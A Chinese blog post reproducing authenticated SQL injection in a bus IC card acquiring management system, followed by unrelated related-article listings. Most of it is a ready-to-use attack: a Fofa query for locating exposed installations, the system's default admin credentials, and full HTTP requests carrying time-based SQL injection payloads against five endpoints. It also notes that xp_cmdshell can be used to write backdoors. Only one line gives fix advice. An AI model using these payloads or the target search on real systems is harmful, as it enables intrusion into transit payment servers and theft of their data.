公交IC卡收单管理系统 多接口SQL注入

已于 2024-09-30 12:39:39 修改
阅读量78 收藏 2
点赞数 4
文章标签: 安全
于 2024-09-30 12:35:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142653079
版权

0x01 产品描述:

        公交IC卡系统是公交一卡通系统核心建设部分,是高时尚、高科技的管理系统,大大提升了公交行业的服务,能让公交企业信息化和电子化打下一个良好的硬件基础和软件基

0x02 漏洞描述:

        公交IC卡系统在/role,/user,/bus,/line,/parametercard接口中存在sql注入。使用弱口令登录后经身份验证的攻击者可通过这些接口写入sql语句获取系统中数据,高权限账号可调用xp_cmdshell写入后门文件。

0x03 搜索语句:

Fofa:app="公交IC卡收单管理系统"

0x04 漏洞复现:

漏洞需要用到权限校验,我们使用系统存在的弱口令进行登录

username:admin
password:e10adc3949ba59abbe56e057f20f883e

 

调用接口/login获取登录cookie

POST /login HTTP/1.1
Host: your-ip
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

username=admin&password=e10adc3949ba59abbe56e057f20f883e

 

使用获取的cookie带入到存在sql注入接口中

/role接口

POST /role HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=2158E0CABE9B58C93F508ECF0FCD2B65
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'--

 

/parametercard接口

POST /parametercard HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=2158E0CABE9B58C93F508ECF0FCD2B65
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

method=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--

/user接口

POST /user HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=2158E0CABE9B58C93F508ECF0FCD2B65
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5

 /bus接口

POST /bus HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=2158E0CABE9B58C93F508ECF0FCD2B65
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'--bus

 

/line接口

POST /line HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=2158E0CABE9B58C93F508ECF0FCD2B65
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--

 

调用shell

0x05 修复建议:

使用参数化查询防止SQL注入攻击,并提高代码的可读性和可维护性。

iSee857
关注
公交IC卡收单管理系统 多处接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
09-26 335
公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。其user、bus、line、role等接口处存在SQL注入(其注入需要登录状态下)。
公交IC卡收单管理系统 多处 SQL注入致RCE漏洞复现
0xSec
09-25 659
公交IC卡收单管理系统role、user、bus、line、parametercard 等多个接口存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
【漏洞复现】公交IC卡收单管理系统 SQL注入致RCE漏洞复现
qq_48368964的博客
09-27 711
公交IC卡收单 管理系统Q是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。公交IC卡收单管理系统 role、user、bus、line、parametercard 等多个接口存在SQL注入漏洞。POC-5 公交IC卡收单管理系统parametercard存在SQL注入漏洞。
基于java固定资产管理系统设计(含源文件)
【完整】
03-08 6866
欢迎添加微信互相交流学习哦! 项目源码:https://gitee.com/oklongmm/biye 固定资产管理系统 摘 要 随着计算机信息技术的发展以及对资产、设备的管理科学化、合理化的高要求,利用计算机实现设备及资产的信息化管理已经显得非常重要。 固定资产管理系统是一个单位不可缺少的部分。但一直以来人们使用传统的人工方式管理固定资产的信息,这种管理方式存在着许多缺点,这对于查找、更新和维护都带来了不小的困难。因此,开发一个界面友好,易操作的资产管理软件进行自动化管理变得十分重要。这正是本系.
spring boot停车场管理系统的设计与实现 毕业设计源码39315
weixin1_ZYKJ985的博客
07-25 294
本设计主要实现集人性化、高效率、便捷等优点于一身的停车场管理系统,完成首页、轮播图、公告信息、资源管理(新闻资讯、资讯分类)系统用户(管理员、普通用户)模块管理(车库信息、停车信息、离场信息)等功能模块。系统通过浏览器与服务器进行通信,实现数据的交互与变更.....
26计算机操作系统408考研-操作系统系统安全篇章(四)
海海不掉头发的的博客
05-26 730
系统安全从人类历史上的第一台计算机诞生至今,计算机硬件与软件技术都在经历持续不断的飞速发展。计算机的普及带领人们步入信息时代,而计算机技术在生产、生活各个领域的广泛应用则推动人类文明快步向前。随着人们对计算机系统及相关技术依赖性的日趋上升,计算机在使用过程中的安全问题也愈来愈受到重视,高效且可靠的运行和使用计算机系统成为计算机学科领域普遍关注的重要问题。计算机安全是计算机与网络领域的信息安全的一个分支,其研究目的是改善计算机系统及其应用中的不可靠因素,以保证计算机正常安全地运行。
基于spring boot+MySQL停车场管理系统的设计与实现-计算机毕设 附源码39315
WeiXin_DZbishe的博客
06-12 1870
停车场管理系统在对需求做解析后,整个系统主要分为两个部分:管理员和普通用户,每个模块下的分支功能不一样。对功能做出如下说明: 普通用户模块: 账号注册。 账号登录认证。 管理个人资料信息,修改可修改的信息项。 车位信息,查看停车场车位信息。 预约信息,同时查看历史预约的记录。 物品挂失,同时查看物品挂失的记录。 停车信息,同时查看历史停车的记录。 离场信息,同时查看历史离场的记录。 管理员模块: 维护普通用户,审核普通用户的账号,可以冻结普通用户的登录权限,或者删除普通用户账号。 发布停车位,并可以销毁某个
系统设计入门
Mr.Phoebe的专栏
01-13 2万+
原文地址:github.com/donnemartin/system-design-primer 译文地址:系统设计入门 译文出自:掘金翻译计划 译者:XatMassacrE、L9m、Airmacho、xiaoyusilen、jifaxu 这个 链接 用来查看本翻译与英文版是否有差别(如果你没有看到 README.md 发生变化,那就意味着这份翻译文档是最新的)。 系
(附源码)springboot 智能停车场系统 毕业设计065415
ID3461074420的博客
09-02 2770
普通用户模块: 账号注册。 账号登录认证。 管理个人资料信息,修改可修改的信息项。 个人车辆管理,用户登记个人拥有的车辆。 车辆入场查询,同时查看历史已入场的记录。 车辆出库信息查询,同时查看历史已出库信息的记录。 管理员模块: 维护普通用户,审核普通用户的账号,可以冻结普通用户的登录权限,或者删除普通用户账号。 发布停车位,并可以销毁某个停车位,更新停车位数据,模糊搜索停车位数据等。 车辆入场,同时查看历史已入场的记录。 车辆出库信息,同时查看历史已出库信息的记录。
软考A计划-电子商务设计师-模拟试题卷一
空名先生
06-06 2205
有什么需要欢迎文章底部卡片私我,获取更多支持,交流让学习不再孤单
ym——Andorid-15k+的面试题。
热门推荐
陈宇明
08-07 2万+
最近才开的博客,希望大家多多关注,andorid开发也做了3年有余了,也面试很多加企业,借此机会分享一下,我们中遇到过的问题以及解决方案吧,希望能够对正在找工作的andoird程序员有一定的帮助。学完本人博客发表《ym--andorid从零开始教程》+面试题目全理解,年薪18w以上绝对没问题。 特别献上整理过的50道面试题目 1.listView的优化方式 重用conve
系统分析师学习笔记(十七)
cecily044的博客
05-10 6439
新技术应用 中间件技术 中间件概述 1.中间件的功能 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源,中间件位于操作系统之上,管理计算资源和网络通信,实现应用之间的互操作。 (1)负责客户机与服务器之间的连接和通信,以及客户机与应用层之间的高效率通信机制。 (2)提供应用层不同服务之间的互操作机制,以及应用层与数据库之间的连接和控制机制。 (3)提供一个多层架构的应用开发和运行的平台,以及一个应用开发框架,支持模块化的应用开发。 (4)屏蔽硬件、操作系统、网络和数据
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1442
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 399
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
数据库的全透明加密和半透明加密主要是针对数据存储安全的不同处理方式
weixin_45699851的博客
09-25 349
对于应用程序来说,它处理的是密文,而加密过程和解密过程都是由数据库系统在后台自动完成的。这种模式下,开发者几乎察觉不到加密的存在,查询和操作的速度不会受到影响,因为大部分加密操作都在内存中快速完成。当数据被插入到数据库时,它会被加密,但对于读取数据的应用程序来说,它仍然能看到明文结果。这意味着应用程序需要知道如何处理加密后的数据,比如查询前先解密,然后对解密后的数据进行操作,再加密返回给客户端。这种方式牺牲了一些便利性,但可以提供更好的性能,因为它不需要每次查询都做完整的加密解密处理。
【中关村在线-注册/登录安全分析报告】
09-23 986
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
PingCastle:一款针对活动目录AD的安全强化工具
FreeBuf_的博客
09-24 825
PingCastle是一款针对活动目录AD的安全强化工具,可以帮助广大研究人员提升活动目录的安全性,该工具甚至可以做到在 20% 的时间内实现 80% 的AD安全性。
Kotlin:变量声明,null安全,条件语句,函数,类与对象
IH_LZH的博客
09-26 1114
在Kotlin中,对于这些可为null值的变量,Kotlin提供了多种机制来安全地处理它们, 在java中,默认情况下变量是可以为null的,方法的调用者为null时,就会出现空指针异常:NullPointerException
安全点的应用场景及其原理详解
最新发布
lssffy的博客
09-28 1025
安全点(Safepoint)是JVM运行过程中,所有Java线程必须达到的一个特定状态点。在这个点上,所有线程都会暂停执行,进入一个安全的状态,以便JVM执行某些全局操作。线程在执行到某个特定的安全点时,才能安全地被暂停,而线程不能在任意位置暂停,这是为了保证暂停时系统状态的一致性。每个线程在达到安全点时,会等待JVM进行的全局操作(例如垃圾回收或其他操作)完成,然后恢复执行。这种机制确保在进行全局操作时,线程之间的数据不会发生不一致的情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值